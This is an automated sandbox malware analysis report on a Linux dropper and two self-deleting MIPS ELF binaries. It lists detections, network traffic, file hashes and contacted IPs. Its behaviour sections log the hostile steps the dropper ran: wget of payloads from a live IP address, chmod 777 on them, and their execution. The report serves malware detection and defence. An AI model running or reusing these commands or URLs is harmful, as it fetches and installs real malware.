Linux Analysis Report

Overview

General Information

Analysis ID:	1562234
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus detection for dropped file

Manipulation of devices in /dev

Sample deletes itself

ELF contains segments with high entropy indicating compressed/encrypted content

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "rm" command used to delete files or directories

Executes the "wget" command typically used for HTTP/S downloading

Sample tries to set the executable flag

Sets full permissions to files and/or directories

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Classification

Signatures

AV Detection

Antivirus detection for dropped file

Source: /tmp/zte	Avira: detection malicious, Label: PUA/AVF.Agent.jcccr
Source: /tmp/faith	Avira: detection malicious, Label: LINUX/AVI.Agent.dqzbs

Executes the "wget" command typically used for HTTP/S downloading

Source: /bin/sh (PID: 6229)	Wget executable: /usr/bin/wget -> wget http://65.175.140.164/images/faith			Jump to behavior
Source: /bin/sh (PID: 6264)	Wget executable: /usr/bin/wget -> wget http://65.175.140.164/images/zte			Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164
Source: unknown	TCP traffic detected without corresponding DNS query: 65.175.140.164

Source: global traffic	HTTP traffic detected: GET /images/faith HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 65.175.140.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/zte HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 65.175.140.164Connection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown	Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: classification engine

Classification label: mal56.evad.lin@0/4@0/0

Data Obfuscation

Manipulation of devices in /dev

Source: /tmp/faith (PID: 6252)	Deleted: /dev/test_write	Jump to behavior
Source: /tmp/faith (PID: 6252)	Written: /dev/test_write	Jump to behavior
Source: /tmp/zte (PID: 6266)	Deleted: /dev/test_write	Jump to behavior
Source: /tmp/zte (PID: 6266)	Written: /dev/test_write	Jump to behavior

Executes commands using a shell command-line interpreter

Source: /tmp/faith (PID: 6254)	Shell command executed: sh -c mount			Jump to behavior
Source: /tmp/zte (PID: 6268)	Shell command executed: sh -c mount			Jump to behavior

Executes the "chmod" command used to modify permissions

Source: /bin/sh (PID: 6251)	Chmod executable: /usr/bin/chmod -> chmod 777 faith			Jump to behavior
Source: /bin/sh (PID: 6265)	Chmod executable: /usr/bin/chmod -> chmod 777 zte			Jump to behavior

Executes the "rm" command used to delete files or directories

Source: /usr/bin/dash (PID: 6232)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq			Jump to behavior
Source: /usr/bin/dash (PID: 6233)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq			Jump to behavior

Executes the "wget" command typically used for HTTP/S downloading

Source: /bin/sh (PID: 6229)	Wget executable: /usr/bin/wget -> wget http://65.175.140.164/images/faith			Jump to behavior
Source: /bin/sh (PID: 6264)	Wget executable: /usr/bin/wget -> wget http://65.175.140.164/images/zte			Jump to behavior

Sample tries to set the executable flag

Source: /usr/bin/chmod (PID: 6251)	File: /tmp/faith (bits: - usr: rwx grp: rwx all: rwx)			Jump to behavior
Source: /usr/bin/chmod (PID: 6265)	File: /tmp/zte (bits: - usr: rwx grp: rwx all: rwx)			Jump to behavior

Sets full permissions to files and/or directories

Source: /bin/sh (PID: 6251)	Chmod executable with 777: /usr/bin/chmod -> chmod 777 faith			Jump to behavior
Source: /bin/sh (PID: 6265)	Chmod executable with 777: /usr/bin/chmod -> chmod 777 zte			Jump to behavior

Writes ELF files to disk

Source: /usr/bin/wget (PID: 6229)	File written: /tmp/faith			Jump to dropped file
Source: /usr/bin/wget (PID: 6264)	File written: /tmp/zte			Jump to dropped file

Source: submitted sample

Stderr: --2024-11-25 04:35:29-- http://65.175.140.164/images/faithConnecting to 65.175.140.164:80... connected.HTTP request sent, awaiting response... 200 OKLength: 69440 (68K) [text/plain]Saving to: faith 0K .......... .......... .......... .......... .......... 73% 123K 0s 50K .......... ....... 100% 526K=0.4s2024-11-25 04:35:31 (154 KB/s) - faith saved [69440/69440]--2024-11-25 04:35:31-- http://65.175.140.164/images/zteConnecting to 65.175.140.164:80... connected.HTTP request sent, awaiting response... 200 OKLength: 68124 (67K) [text/plain]Saving to: zte 0K .......... .......... .......... .......... .......... 75% 123K 0s 50K .......... ...... 100% 557K=0.4s2024-11-25 04:35:33 (153 KB/s) - zte saved [68124/68124]: exit code = 0

Hooking and other Techniques for Hiding and Protection

Sample deletes itself

Source: /tmp/faith (PID: 6252)	File: /tmp/faith			Jump to behavior
Source: /tmp/zte (PID: 6266)	File: /tmp/zte			Jump to behavior

ELF contains segments with high entropy indicating compressed/encrypted content

Source: faith.12.dr	Dropped file: segment LOAD with 7.9127 entropy (max. 8.0)
Source: faith.12.dr	Dropped file: segment LOAD with 7.971 entropy (max. 8.0)
Source: zte.27.dr	Dropped file: segment LOAD with 7.9076 entropy (max. 8.0)
Source: zte.27.dr	Dropped file: segment LOAD with 7.9709 entropy (max. 8.0)

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/faith (PID: 6252)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mount (PID: 6260)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/zte (PID: 6266)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mount (PID: 6273)	Queries kernel information via 'uname':	Jump to behavior

Source: sh, 6252.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp, faith, 6252.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp, faith, 6262.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: sh, 6252.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp, faith, 6252.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp, faith, 6262.1.000055b0d85e4000.000055b0d868b000.rw-.sdmp	Binary or memory string: U1!/etc/qemu-binfmt/mipsel
Source: sh, 6266.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp, zte, 6266.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp, zte, 6275.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: sh, 6252.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp, faith, 6252.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp, faith, 6262.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mipsel./faithfaith2SUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/usr/binCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./faith
Source: sh, 6266.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp, zte, 6266.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp, zte, 6275.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips./ztefaith2SUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./zte
Source: sh, 6266.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp, zte, 6266.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp, zte, 6275.1.00007ffdd2963000.00007ffdd2984000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: sh, 6266.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp, zte, 6266.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp, zte, 6275.1.000055bbedc6a000.000055bbedd11000.rw-.sdmp	Binary or memory string: U1!/etc/qemu-binfmt/mips
Source: sh, 6252.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp, faith, 6252.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp, faith, 6262.1.00007ffd4bd6a000.00007ffd4bd8b000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel

Screenshots

No Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
54.171.230.55	unknown	United States	16509	AMAZON-02US	false
65.175.140.164	unknown	United States	32448	METROCAST-1US	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://65.175.140.164/images/zte	false	Avira URL Cloud: malware	unknown
http://65.175.140.164/images/faith	false	Avira URL Cloud: malware	unknown

ID:	1562234
Product:	CloudBasic
Start time:	11:34:45
Start date:	25.11.2024
Cookbook:	defaultlinuxcmdlinecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX

Name	Type	MD5	SHA1	SHA256
/dev/test_write	data	F98BD17A99449C1486AEAEA68578C612	2CDC1584DCCD70B5CF4E5784FD057363D7BD340C	3640BBCC7F8E516C7FD2436587D9C3B81F17806E1A933452D684541AE1565D70
/tmp/faith	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header	342432EBC4CAF520BA541C96916AF5FA	59757A3FCFAE595E5B3FB8D2E1CD0295B74B7E62	FE5B23807C9EAE2B931F7D459D8B94EC2959B055BDDC55D027CC6883AFBBEACF
/tmp/zte	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header	10115C0CF85C43E0C5B135EA8A3DA819	CFC5A275EA42697C8B03749438FE930E58D2088F	616ABA5FC8F7C86E38390CE215A2C8BBF07310A809FFE14E3F1CD78A8715FE60

Linux Analysis Report

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Screenshots

Network Map

Contacted Public IPs

Contacted URLs